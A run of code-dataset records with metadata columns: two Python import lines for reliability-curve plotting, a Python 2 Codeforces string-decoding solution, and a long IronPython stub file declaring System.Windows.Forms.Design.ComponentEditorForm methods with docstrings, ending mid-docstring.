from .binary_reliability_curve import plot_binary_reliability_curve
from .bootstrapped_binary_reliability_curve import plot_bootstrapped_binary_reliability_curve | 31.555556 | 93 | 0.848592 | 34 | 284 | 6.617647 | 0.411765 | 0.453333 | 0.391111 | 0.24 | 0.284444 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003817 | 0.077465 | 284 | 9 | 93 | 31.555556 | 0.854962 | 0.165493 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
bc342136c87b638cd9692a1e4da4b2e968502aa8 | 1,177 | py | Python | codeforces/746B.py | italo-batista/problems-solving | f83ad34f0abebd52925c4020635556f20743ba06 | [
"MIT"
] | null | null | null | codeforces/746B.py | italo-batista/problems-solving | f83ad34f0abebd52925c4020635556f20743ba06 | [
"MIT"
] | null | null | null | codeforces/746B.py | italo-batista/problems-solving | f83ad34f0abebd52925c4020635556f20743ba06 | [
"MIT"
] | null | null | null | tam = int(raw_input())
encode = str(raw_input())
word = [""] * tam
letters = tam
if tam % 2 == 0:
mid = tam / 2 -1
else:
mid = tam / 2
i = mid
curr = 0
if tam % 2 != 0:
while letters > 0:
if curr < tam:
if curr == 0:
word[mid] = encode[curr]
curr = curr + 1
elif curr % 2 != 0:
i = mid - (i - mid) - 1
word[i] = encode[curr]
curr = curr + 1
else:
i = mid + (mid - i)
word[i] = encode[curr]
curr = curr + 1
letters = letters - 1
else:
break
else:
while letters > 0:
if curr < tam:
if curr == 0:
word[mid] = encode[curr]
curr = curr + 1
elif curr % 2 != 0:
i = mid + (mid - i) + 1
word[i] = encode[curr]
curr = curr + 1
else:
i = mid - (i - mid)
word[i] = encode[curr]
curr = curr + 1
letters = letters - 1
else:
break
print "".join(word) | 18.983871 | 40 | 0.361088 | 134 | 1,177 | 3.156716 | 0.156716 | 0.22695 | 0.198582 | 0.255319 | 0.70922 | 0.70922 | 0.70922 | 0.70922 | 0.70922 | 0.70922 | 0 | 0.046595 | 0.525913 | 1,177 | 62 | 41 | 18.983871 | 0.71147 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.022222 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
70ae87be832c214bd2d1f7ce6e04028ada20639c | 162,484 | py | Python | release/stubs/System/Windows/Forms/Design.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 182 | 2017-06-27T02:26:15.000Z | 2022-03-30T18:53:43.000Z | release/stubs/System/Windows/Forms/Design.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 28 | 2017-06-27T13:38:23.000Z | 2022-03-15T11:19:44.000Z | release/stubs/System/Windows/Forms/Design.py | htlcnn/ironpython-stubs | 780d829e2104b2789d5f4d6f32b0ec9f2930ca03 | [
"MIT"
] | 67 | 2017-06-28T09:43:59.000Z | 2022-03-20T21:17:10.000Z | # encoding: utf-8
# module System.Windows.Forms.Design calls itself Design
# from System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
class ComponentEditorForm(Form, IComponent, IDisposable, IOleControl, IOleObject, IOleInPlaceObject, IOleInPlaceActiveObject, IOleWindow, IViewObject, IViewObject2, IPersist, IPersistStreamInit, IPersistPropertyBag, IPersistStorage, IQuickActivate, ISupportOleDropSource, IDropTarget, ISynchronizeInvoke, IWin32Window, IArrangedElement, IBindableComponent, IContainerControl):
"""
Provides a user interface for a System.Windows.Forms.Design.WindowsFormsComponentEditor.
ComponentEditorForm(component: object, pageTypes: Array[Type])
"""
def AccessibilityNotifyClients(self, *args): #cannot find CLR method
"""
AccessibilityNotifyClients(self: Control, accEvent: AccessibleEvents, objectID: int, childID: int)
Notifies the accessibility client applications of the specified
System.Windows.Forms.AccessibleEvents for the specified child control .
accEvent: The System.Windows.Forms.AccessibleEvents to notify the accessibility client applications of.
objectID: The identifier of the System.Windows.Forms.AccessibleObject.
childID: The child System.Windows.Forms.Control to notify of the accessible event.
AccessibilityNotifyClients(self: Control, accEvent: AccessibleEvents, childID: int)
Notifies the accessibility client applications of the specified
System.Windows.Forms.AccessibleEvents for the specified child control.
accEvent: The System.Windows.Forms.AccessibleEvents to notify the accessibility client applications of.
childID: The child System.Windows.Forms.Control to notify of the accessible event.
"""
pass
def ActivateMdiChild(self, *args): #cannot find CLR method
"""
ActivateMdiChild(self: Form, form: Form)
Activates the MDI child of a form.
form: The child form to activate.
"""
pass
def AdjustFormScrollbars(self, *args): #cannot find CLR method
"""
AdjustFormScrollbars(self: Form, displayScrollbars: bool)
Adjusts the scroll bars on the container based on the current control positions and the control
currently selected.
displayScrollbars: true to show the scroll bars; otherwise, false.
"""
pass
def ApplyAutoScaling(self, *args): #cannot find CLR method
"""
ApplyAutoScaling(self: Form)
Resizes the form according to the current value of the
System.Windows.Forms.Form.AutoScaleBaseSize property and the size of the current font.
"""
pass
def CenterToParent(self, *args): #cannot find CLR method
"""
CenterToParent(self: Form)
Centers the position of the form within the bounds of the parent form.
"""
pass
def CenterToScreen(self, *args): #cannot find CLR method
"""
CenterToScreen(self: Form)
Centers the form on the current screen.
"""
pass
def CreateAccessibilityInstance(self, *args): #cannot find CLR method
"""
CreateAccessibilityInstance(self: Control) -> AccessibleObject
Creates a new accessibility object for the control.
Returns: A new System.Windows.Forms.AccessibleObject for the control.
"""
pass
def CreateControlsInstance(self, *args): #cannot find CLR method
"""
CreateControlsInstance(self: Form) -> ControlCollection
Returns: A new instance of System.Windows.Forms.Control.ControlCollection assigned to the control.
"""
pass
def CreateHandle(self, *args): #cannot find CLR method
"""
CreateHandle(self: Form)
Creates the handle for the form. If a derived class overrides this function, it must call the
base implementation.
"""
pass
def DefWndProc(self, *args): #cannot find CLR method
"""
DefWndProc(self: Form, m: Message) -> Message
m: The Windows System.Windows.Forms.Message to process.
"""
pass
def DestroyHandle(self, *args): #cannot find CLR method
"""
DestroyHandle(self: Control)
Destroys the handle associated with the control.
"""
pass
def Dispose(self):
"""
Dispose(self: Form, disposing: bool)
Disposes of the resources (other than memory) used by the System.Windows.Forms.Form.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def GetAccessibilityObjectById(self, *args): #cannot find CLR method
"""
GetAccessibilityObjectById(self: Control, objectId: int) -> AccessibleObject
Retrieves the specified System.Windows.Forms.AccessibleObject.
objectId: An Int32 that identifies the System.Windows.Forms.AccessibleObject to retrieve.
Returns: An System.Windows.Forms.AccessibleObject.
"""
pass
def GetAutoSizeMode(self, *args): #cannot find CLR method
"""
GetAutoSizeMode(self: Control) -> AutoSizeMode
Retrieves a value indicating how a control will behave when its
System.Windows.Forms.Control.AutoSize property is enabled.
Returns: One of the System.Windows.Forms.AutoSizeMode values.
"""
pass
def GetScaledBounds(self, *args): #cannot find CLR method
"""
GetScaledBounds(self: Form, bounds: Rectangle, factor: SizeF, specified: BoundsSpecified) -> Rectangle
bounds: A System.Drawing.Rectangle that specifies the area for which to retrieve the display bounds.
factor: The height and width of the control's bounds.
specified: One of the values of System.Windows.Forms.BoundsSpecified that specifies the bounds of the
control to use when defining its size and position.
Returns: A System.Drawing.Rectangle representing the bounds within which the control is scaled.
"""
pass
def GetScrollState(self, *args): #cannot find CLR method
"""
GetScrollState(self: ScrollableControl, bit: int) -> bool
Determines whether the specified flag has been set.
bit: The flag to check.
Returns: true if the specified flag has been set; otherwise, false.
"""
pass
def GetService(self, *args): #cannot find CLR method
"""
GetService(self: Component, service: Type) -> object
Returns an object that represents a service provided by the System.ComponentModel.Component or
by its System.ComponentModel.Container.
service: A service provided by the System.ComponentModel.Component.
Returns: An System.Object that represents a service provided by the System.ComponentModel.Component, or
null if the System.ComponentModel.Component does not provide the specified service.
"""
pass
def GetStyle(self, *args): #cannot find CLR method
"""
GetStyle(self: Control, flag: ControlStyles) -> bool
Retrieves the value of the specified control style bit for the control.
flag: The System.Windows.Forms.ControlStyles bit to return the value from.
Returns: true if the specified control style bit is set to true; otherwise, false.
"""
pass
def GetTopLevel(self, *args): #cannot find CLR method
"""
GetTopLevel(self: Control) -> bool
Determines if the control is a top-level control.
Returns: true if the control is a top-level control; otherwise, false.
"""
pass
def InitLayout(self, *args): #cannot find CLR method
"""
InitLayout(self: Control)
Called after the control has been added to another container.
"""
pass
def InvokeGotFocus(self, *args): #cannot find CLR method
"""
InvokeGotFocus(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.GotFocus event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokeLostFocus(self, *args): #cannot find CLR method
"""
InvokeLostFocus(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LostFocus event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokeOnClick(self, *args): #cannot find CLR method
"""
InvokeOnClick(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Click event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Click event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokePaint(self, *args): #cannot find CLR method
"""
InvokePaint(self: Control, c: Control, e: PaintEventArgs)
Raises the System.Windows.Forms.Control.Paint event for the specified control.
c: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Paint event to.
e: An System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def InvokePaintBackground(self, *args): #cannot find CLR method
"""
InvokePaintBackground(self: Control, c: Control, e: PaintEventArgs)
Raises the PaintBackground event for the specified control.
c: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Paint event to.
e: An System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def IsInputChar(self, *args): #cannot find CLR method
"""
IsInputChar(self: Control, charCode: Char) -> bool
Determines if a character is an input character that the control recognizes.
charCode: The character to test.
Returns: true if the character should be sent directly to the control and not preprocessed; otherwise,
false.
"""
pass
def IsInputKey(self, *args): #cannot find CLR method
"""
IsInputKey(self: Control, keyData: Keys) -> bool
Determines whether the specified key is a regular input key or a special key that requires
preprocessing.
keyData: One of the System.Windows.Forms.Keys values.
Returns: true if the specified key is a regular input key; otherwise, false.
"""
pass
def MemberwiseClone(self, *args): #cannot find CLR method
"""
MemberwiseClone(self: MarshalByRefObject, cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity, which will cause the
object to be assigned a new identity when it is marshaled across a remoting boundary. A value of
false is usually appropriate. true to copy the current System.MarshalByRefObject object's
identity to its clone, which will cause remoting client calls to be routed to the remote server
object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
def NotifyInvalidate(self, *args): #cannot find CLR method
"""
NotifyInvalidate(self: Control, invalidatedArea: Rectangle)
Raises the System.Windows.Forms.Control.Invalidated event with a specified region of the control
to invalidate.
invalidatedArea: A System.Drawing.Rectangle representing the area to invalidate.
"""
pass
def OnActivated(self, *args): #cannot find CLR method
"""
OnActivated(self: ComponentEditorForm, e: EventArgs)
Raises the System.Windows.Forms.Form.Activated event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnAutoSizeChanged(self, *args): #cannot find CLR method
"""
OnAutoSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.AutoSizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnAutoValidateChanged(self, *args): #cannot find CLR method
"""
OnAutoValidateChanged(self: ContainerControl, e: EventArgs)
Raises the System.Windows.Forms.ContainerControl.AutoValidateChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackColorChanged(self, *args): #cannot find CLR method
"""
OnBackColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackgroundImageChanged(self, *args): #cannot find CLR method
"""
OnBackgroundImageChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageChanged event.
e: An System.EventArgs that contains the data.
"""
pass
def OnBackgroundImageLayoutChanged(self, *args): #cannot find CLR method
"""
OnBackgroundImageLayoutChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageLayoutChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBindingContextChanged(self, *args): #cannot find CLR method
"""
OnBindingContextChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BindingContextChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnCausesValidationChanged(self, *args): #cannot find CLR method
"""
OnCausesValidationChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CausesValidationChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnChangeUICues(self, *args): #cannot find CLR method
"""
OnChangeUICues(self: Control, e: UICuesEventArgs)
Raises the System.Windows.Forms.Control.ChangeUICues event.
e: A System.Windows.Forms.UICuesEventArgs that contains the event data.
"""
pass
def OnClick(self, *args): #cannot find CLR method
"""
OnClick(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Click event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnClientSizeChanged(self, *args): #cannot find CLR method
"""
OnClientSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ClientSizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnClosed(self, *args): #cannot find CLR method
"""
OnClosed(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.Closed event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnClosing(self, *args): #cannot find CLR method
"""
OnClosing(self: Form, e: CancelEventArgs)
Raises the System.Windows.Forms.Form.Closing event.
e: A System.ComponentModel.CancelEventArgs that contains the event data.
"""
pass
def OnContextMenuChanged(self, *args): #cannot find CLR method
"""
OnContextMenuChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ContextMenuChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnContextMenuStripChanged(self, *args): #cannot find CLR method
"""
OnContextMenuStripChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ContextMenuStripChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnControlAdded(self, *args): #cannot find CLR method
"""
OnControlAdded(self: Control, e: ControlEventArgs)
Raises the System.Windows.Forms.Control.ControlAdded event.
e: A System.Windows.Forms.ControlEventArgs that contains the event data.
"""
pass
def OnControlRemoved(self, *args): #cannot find CLR method
"""
OnControlRemoved(self: Control, e: ControlEventArgs)
Raises the System.Windows.Forms.Control.ControlRemoved event.
e: A System.Windows.Forms.ControlEventArgs that contains the event data.
"""
pass
def OnCreateControl(self, *args): #cannot find CLR method
"""
OnCreateControl(self: Form)
Raises the CreateControl event.
"""
pass
def OnCursorChanged(self, *args): #cannot find CLR method
"""
OnCursorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CursorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDeactivate(self, *args): #cannot find CLR method
"""
OnDeactivate(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.Deactivate event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnDockChanged(self, *args): #cannot find CLR method
"""
OnDockChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DockChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDoubleClick(self, *args): #cannot find CLR method
"""
OnDoubleClick(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DoubleClick event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDpiChanged(self, *args): #cannot find CLR method
""" OnDpiChanged(self: Form, e: DpiChangedEventArgs) """
pass
def OnDpiChangedAfterParent(self, *args): #cannot find CLR method
""" OnDpiChangedAfterParent(self: Control, e: EventArgs) """
pass
def OnDpiChangedBeforeParent(self, *args): #cannot find CLR method
""" OnDpiChangedBeforeParent(self: Control, e: EventArgs) """
pass
def OnDragDrop(self, *args): #cannot find CLR method
"""
OnDragDrop(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragDrop event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragEnter(self, *args): #cannot find CLR method
"""
OnDragEnter(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragEnter event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragLeave(self, *args): #cannot find CLR method
"""
OnDragLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DragLeave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDragOver(self, *args): #cannot find CLR method
"""
OnDragOver(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragOver event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnEnabledChanged(self, *args): #cannot find CLR method
"""
OnEnabledChanged(self: Form, e: EventArgs)
e: An System.EventArgs that contains the event data.
"""
pass
def OnEnter(self, *args): #cannot find CLR method
"""
OnEnter(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Control.Enter event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnFontChanged(self, *args): #cannot find CLR method
"""
OnFontChanged(self: Form, e: EventArgs)
e: An System.EventArgs that contains the event data.
"""
pass
def OnForeColorChanged(self, *args): #cannot find CLR method
"""
OnForeColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ForeColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnFormClosed(self, *args): #cannot find CLR method
"""
OnFormClosed(self: Form, e: FormClosedEventArgs)
Raises the System.Windows.Forms.Form.FormClosed event.
e: A System.Windows.Forms.FormClosedEventArgs that contains the event data.
"""
pass
def OnFormClosing(self, *args): #cannot find CLR method
"""
OnFormClosing(self: Form, e: FormClosingEventArgs)
Raises the System.Windows.Forms.Form.FormClosing event.
e: A System.Windows.Forms.FormClosingEventArgs that contains the event data.
"""
pass
def OnGetDpiScaledSize(self, *args): #cannot find CLR method
""" OnGetDpiScaledSize(self: Form, deviceDpiOld: int, deviceDpiNew: int, desiredSize: Size) -> (bool, Size) """
pass
def OnGiveFeedback(self, *args): #cannot find CLR method
"""
OnGiveFeedback(self: Control, gfbevent: GiveFeedbackEventArgs)
Raises the System.Windows.Forms.Control.GiveFeedback event.
gfbevent: A System.Windows.Forms.GiveFeedbackEventArgs that contains the event data.
"""
pass
def OnGotFocus(self, *args): #cannot find CLR method
"""
OnGotFocus(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.GotFocus event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnHandleCreated(self, *args): #cannot find CLR method
"""
OnHandleCreated(self: Form, e: EventArgs)
e: An System.EventArgs that contains the event data.
"""
pass
def OnHandleDestroyed(self, *args): #cannot find CLR method
"""
OnHandleDestroyed(self: Form, e: EventArgs)
e: An System.EventArgs that contains the event data.
"""
pass
def OnHelpButtonClicked(self, *args): #cannot find CLR method
"""
OnHelpButtonClicked(self: Form, e: CancelEventArgs)
Raises the System.Windows.Forms.Form.HelpButtonClicked event.
e: A System.ComponentModel.CancelEventArgs that contains the event data.
"""
pass
def OnHelpRequested(self, *args): #cannot find CLR method
"""
OnHelpRequested(self: ComponentEditorForm, e: HelpEventArgs)
Raises the System.Windows.Forms.Control.HelpRequested event.
e: A System.Windows.Forms.HelpEventArgs that contains the event data.
"""
pass
def OnImeModeChanged(self, *args): #cannot find CLR method
"""
OnImeModeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ImeModeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnInputLanguageChanged(self, *args): #cannot find CLR method
"""
OnInputLanguageChanged(self: Form, e: InputLanguageChangedEventArgs)
Raises the System.Windows.Forms.Form.InputLanguageChanged event.
e: The System.Windows.Forms.InputLanguageChangedEventArgs that contains the event data.
"""
pass
def OnInputLanguageChanging(self, *args): #cannot find CLR method
"""
OnInputLanguageChanging(self: Form, e: InputLanguageChangingEventArgs)
Raises the System.Windows.Forms.Form.InputLanguageChanging event.
e: The System.Windows.Forms.InputLanguageChangingEventArgs that contains the event data.
"""
pass
def OnInvalidated(self, *args): #cannot find CLR method
"""
OnInvalidated(self: Control, e: InvalidateEventArgs)
Raises the System.Windows.Forms.Control.Invalidated event.
e: An System.Windows.Forms.InvalidateEventArgs that contains the event data.
"""
pass
def OnKeyDown(self, *args): #cannot find CLR method
"""
OnKeyDown(self: Control, e: KeyEventArgs)
Raises the System.Windows.Forms.Control.KeyDown event.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def OnKeyPress(self, *args): #cannot find CLR method
"""
OnKeyPress(self: Control, e: KeyPressEventArgs)
Raises the System.Windows.Forms.Control.KeyPress event.
e: A System.Windows.Forms.KeyPressEventArgs that contains the event data.
"""
pass
def OnKeyUp(self, *args): #cannot find CLR method
"""
OnKeyUp(self: Control, e: KeyEventArgs)
Raises the System.Windows.Forms.Control.KeyUp event.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def OnLayout(self, *args): #cannot find CLR method
"""
OnLayout(self: Form, levent: LayoutEventArgs)
Raises the System.Windows.Forms.Control.Layout event.
levent: The event data.
"""
pass
def OnLeave(self, *args): #cannot find CLR method
"""
OnLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Leave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnLoad(self, *args): #cannot find CLR method
"""
OnLoad(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.Load event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnLocationChanged(self, *args): #cannot find CLR method
"""
OnLocationChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LocationChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnLostFocus(self, *args): #cannot find CLR method
"""
OnLostFocus(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LostFocus event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMarginChanged(self, *args): #cannot find CLR method
"""
OnMarginChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MarginChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnMaximizedBoundsChanged(self, *args): #cannot find CLR method
"""
OnMaximizedBoundsChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MaximizedBoundsChanged event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnMaximumSizeChanged(self, *args): #cannot find CLR method
"""
OnMaximumSizeChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MaximumSizeChanged event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnMdiChildActivate(self, *args): #cannot find CLR method
"""
OnMdiChildActivate(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MdiChildActivate event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnMenuComplete(self, *args): #cannot find CLR method
"""
OnMenuComplete(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MenuComplete event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnMenuStart(self, *args): #cannot find CLR method
"""
OnMenuStart(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MenuStart event.
e: The System.EventArgs that contains the event data.
"""
pass
def OnMinimumSizeChanged(self, *args): #cannot find CLR method
"""
OnMinimumSizeChanged(self: Form, e: EventArgs)
Raises the System.Windows.Forms.Form.MinimumSizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseCaptureChanged(self, *args): #cannot find CLR method
"""
OnMouseCaptureChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseCaptureChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseClick(self, *args): #cannot find CLR method
"""
OnMouseClick(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseClick event.
e: An System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseDoubleClick(self, *args): #cannot find CLR method
"""
OnMouseDoubleClick(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseDoubleClick event.
e: An System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseDown(self, *args): #cannot find CLR method
"""
OnMouseDown(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseDown event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseEnter(self, *args): #cannot find CLR method
"""
OnMouseEnter(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseEnter event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseHover(self, *args): #cannot find CLR method
"""
OnMouseHover(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseHover event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseLeave(self, *args): #cannot find CLR method
"""
OnMouseLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseLeave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseMove(self, *args): #cannot find CLR method
"""
OnMouseMove(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseMove event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseUp(self, *args): #cannot find CLR method
"""
OnMouseUp(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseUp event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseWheel(self, *args): #cannot find CLR method
"""
OnMouseWheel(self: ScrollableControl, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseWheel event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMove(self, *args): #cannot find CLR method
"""
OnMove(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Move event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnNotifyMessage(self, *args): #cannot find CLR method
"""
OnNotifyMessage(self: Control, m: Message)
Notifies the control of Windows messages.
m: A System.Windows.Forms.Message that represents the Windows message.
"""
pass
def OnPaddingChanged(self, *args): #cannot find CLR method
"""
OnPaddingChanged(self: ScrollableControl, e: EventArgs)
Raises the System.Windows.Forms.Control.PaddingChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnPaint(self, *args): #cannot find CLR method
"""
OnPaint(self: Form, e: PaintEventArgs)
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnPaintBackground(self, *args): #cannot find CLR method
"""
OnPaintBackground(self: ScrollableControl, e: PaintEventArgs)
Paints the background of the control.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnParentBackColorChanged(self, *args): #cannot find CLR method
"""
OnParentBackColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackColorChanged event when the
System.Windows.Forms.Control.BackColor property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentBackgroundImageChanged(self, *args): #cannot find CLR method
"""
OnParentBackgroundImageChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageChanged event when the
System.Windows.Forms.Control.BackgroundImage property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentBindingContextChanged(self, *args): #cannot find CLR method
"""
OnParentBindingContextChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BindingContextChanged event when the
System.Windows.Forms.Control.BindingContext property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentChanged(self, *args): #cannot find CLR method
"""
OnParentChanged(self: ContainerControl, e: EventArgs)
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentCursorChanged(self, *args): #cannot find CLR method
"""
OnParentCursorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CursorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentEnabledChanged(self, *args): #cannot find CLR method
"""
OnParentEnabledChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.EnabledChanged event when the
System.Windows.Forms.Control.Enabled property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentFontChanged(self, *args): #cannot find CLR method
"""
OnParentFontChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.FontChanged event when the
System.Windows.Forms.Control.Font property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentForeColorChanged(self, *args): #cannot find CLR method
"""
OnParentForeColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ForeColorChanged event when the
System.Windows.Forms.Control.ForeColor property value of the control's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentRightToLeftChanged(self, *args): #cannot find CLR method
"""
